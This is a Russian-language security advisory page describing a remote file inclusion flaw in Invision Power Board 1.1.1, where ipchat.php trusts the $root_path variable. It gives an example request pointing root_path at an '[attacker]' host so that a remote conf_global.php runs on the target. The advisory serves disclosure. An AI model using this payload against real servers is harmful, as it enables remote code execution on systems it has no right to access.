Выполнение произвольных команд в Invision Power Board

Дата публикации:
04.03.2003
Дата изменения:
17.10.2006
Всего просмотров:
2279
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Уязвимость включения файла обнаружена в Invision Power Board. Удаленный пользователь может выполнить произвольный PHP код и команды операционной системы на уязвимом сервере.

Сценарий 'ipchat.php' включает файл conf_global.php через переменную $root_path, но не проверяет правильность местоположения файла.

Удаленный пользователь может определить удаленное местоположение для $root_path переменной, чтобы включить удаленно расположенный файл conf_global.php, который будет выполнен на целевом сервере. Пример:

http://[target]/ipchat.php?root_path=http://[attacker]/

http://[attacker]/conf_global.php
Уязвимость обнаружена в Invision Power Board 1.1.1

Ссылки: Invision Power Board (PHP)
или введите имя

CAPTCHA